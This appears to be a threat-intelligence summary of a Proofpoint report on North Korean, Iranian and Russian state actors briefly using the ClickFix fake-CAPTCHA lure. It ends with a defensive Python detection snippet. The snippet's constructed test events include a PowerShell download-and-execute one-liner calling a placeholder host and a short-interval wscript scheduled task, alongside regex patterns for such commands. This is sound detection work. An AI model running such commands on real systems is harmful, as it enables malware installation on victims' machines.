2025-04-24

Experimentation with the ClickFix Campaign by State-Sponsored Actors

Level: Tactical | Source: Proofpoint | Global


Nation-state actors from North Korea, Iran, and Russia have each been observed incorporating the ClickFix social engineering technique into their cyber operations, demonstrating the willingness of state-sponsored actors to experiment with the technique within their existing tradecraft. ClickFix campaigns have often been used to deploy information-stealing malware. According to reporting by Proofpoint, these actors conducted isolated ClickFix campaigns from October 2024 through February 2025, though none appeared to adopt the method as a sustained tactic. “While several ClickFix sightings were observed, no actor had shown repeated use of the technique in the weeks following. It is unclear why each actor was only observed with one ClickFix campaign or wave while other typical campaigns continue in parallel. We initially hypothesized that this may be due to the technique’s early days among state-sponsored actors as they trial it, or perhaps the technique did not have as much success as others for machine compromise,” Proofpoint stated. Despite its limited use, the appearance of ClickFix across multiple state-sponsored operations in close succession suggests ongoing interest in social engineering innovation.

North Korea-linked TA427 (a.k.a. APT43, Emerald Sleet, Kimsuky) was observed using ClickFix in January and February 2025. The campaign targeted individuals at fewer than five think tanks with decoy diplomatic content delivered via email attachments. Victims who clicked the embedded link were redirected to a fake CAPTCHA and instructed to execute a PowerShell command, which initiated a multistage infection chain. The initial PowerShell command downloaded an additional script and created scheduled tasks designed to run VBScripts at 19- and 20-minute intervals. In more advanced variants, the tasks fetched and executed batch scripts that decoded a secondary PowerShell payload responsible for launching QuasarRAT, a commodity RAT that communicated with its C2 over port 80. Proofpoint confirmed that all infrastructure tied to the operation was newly registered as of January 2025 and largely hosted on compromised systems in South Korea using dynamic DNS services.

Iranian threat actor TA450 (a.k.a. Mango Sandstorm, MuddyWater, Static Kitten) leveraged ClickFix over a two-day window on November 13 and 14, 2024, sending phishing emails from an attacker-controlled domain impersonating Microsoft. These messages were delivered to 39 organizations, primarily across the Middle East, with the highest targeting density in the UAE and Saudi Arabia. The emails instructed users to run a PowerShell command that silently installed RMM tools, most notably Level, though Proofpoint telemetry confirmed historical use of Atera, PDQ Connect, ScreenConnect, and SimpleHelp. TA450 has not been observed using ClickFix since, but it has continued leveraging RMMs in follow-on operations, especially against government and finance entities, with additional targeting across sectors such as healthcare, education, energy, and telecommunications.

Russian-affiliated actors demonstrated two separate applications of ClickFix. The first, by a group referred to as UNK_RemoteRogue, began on December 9, 2024, targeting defense contractors through phishing emails sent via compromised Zimbra servers. These emails included a malicious link directing victims to a spoofed Microsoft Office page in Russian, instructing users to copy and execute a PowerShell payload. This payload ran JavaScript and PowerShell to establish communication with an Empire C2 server. Following this campaign, UNK_RemoteRogue reverted to more conventional techniques but retained infrastructure overlap and similar delivery mechanisms, including forged email headers and intermediate mail servers. In February 2025, the group delivered RDP files using password-protected links to enable remote access and credential capture. Separately, on October 17, 2024, TA422 (assessed with medium confidence by CERT-UA to be APT28) used a Google Sheets-themed phishing lure to initiate a reCAPTCHA prompt, triggering a PowerShell command that created an SSH tunnel and launched Metasploit modules, evidence of the group's experimentation with ClickFix before returning to its standard toolsets.
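As an added illustration from the defender's side (not part of the Proofpoint report or this summary), the following Python applies two detection rules to constructed process-creation events: PowerShell launched from explorer.exe with download-and-run tokens, which is the shape of the paste-a-command step common to all of the campaigns above, and a scheduled task created from PowerShell that runs a script host on a short minute cadence, matching the 19- and 20-minute VBScript tasks in the TA427 chain. The event fields, sample command lines and the domain are constructed for the example.

```python
import re

# Constructed sample process-creation events (Sysmon EID 1 style, trimmed to the
# fields the rules use). None of these are real indicators from the Proofpoint report.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://lure.example.invalid/s.ps1 | iex"'},
    {"parent": "powershell.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 19 /tn Sync /tr "wscript.exe C:\\Users\\Public\\s.vbs"'},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\admin\\inventory.ps1"},   # admin running a local script
    {"parent": "services.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks /create /sc daily /tn Backup /tr "C:\\Tools\\backup.exe"'},
]

# Tokens typical of a download-and-run one-liner pasted into the Run dialog.
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b|-enc\w*\s)",
    re.IGNORECASE)
# Minute-level schedule whose action is a script host (wscript/cscript).
SHORT_TASK = re.compile(
    r"/sc\s+minute\s+/mo\s+(\d+).*?/tr\s+\"?(?:wscript|cscript)", re.IGNORECASE)


def clickfix_user_launch(ev):
    """Rule 1: PowerShell spawned by the shell (the Run-dialog path a ClickFix
    lure steers the user down) whose command line fetches and executes content."""
    return (ev["parent"].lower() == "explorer.exe"
            and ev["image"].lower().startswith("powershell")
            and bool(DOWNLOAD_EXEC.search(ev["cmdline"])))


def short_interval_script_task(ev, max_minutes=30):
    """Rule 2: schtasks run from PowerShell registering a script-host task that
    fires every few minutes, as with the 19/20-minute VBScript tasks."""
    if ev["image"].lower() != "schtasks.exe" or ev["parent"].lower() != "powershell.exe":
        return False
    m = SHORT_TASK.search(ev["cmdline"])
    return bool(m) and int(m.group(1)) <= max_minutes


def evaluate(events):
    """Return (rule_name, event_index) for every event that trips a rule."""
    hits = []
    for i, ev in enumerate(events):
        if clickfix_user_launch(ev):
            hits.append(("clickfix_user_launch", i))
        if short_interval_script_task(ev):
            hits.append(("short_interval_script_task", i))
    return hits


if __name__ == "__main__":
    for rule, i in evaluate(SAMPLE_EVENTS):
        print(f"{rule}: {SAMPLE_EVENTS[i]['cmdline']}")
```

Rule 1 is deliberately narrow on the explorer.exe parent so that scripts launched by scheduled tasks or management agents do not fire it; a real deployment would tune the token list and the parent set to the environment's baseline.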

Each of these operations demonstrates isolated use of the ClickFix technique within broader espionage campaigns, aligning with the pattern of trial-and-error adoption of cybercrime tactics by state-sponsored actors. While the technique has yet to become a staple within their toolkits, the near-simultaneous experimentation by multiple actors from different geopolitical spheres suggests continued interest in refining user-driven execution methods. Proofpoint’s analysis notes that TA427 may already be iterating on the tactic again as of April 2025, indicating that ClickFix may yet evolve into a more persistent feature of state-linked threat activity.
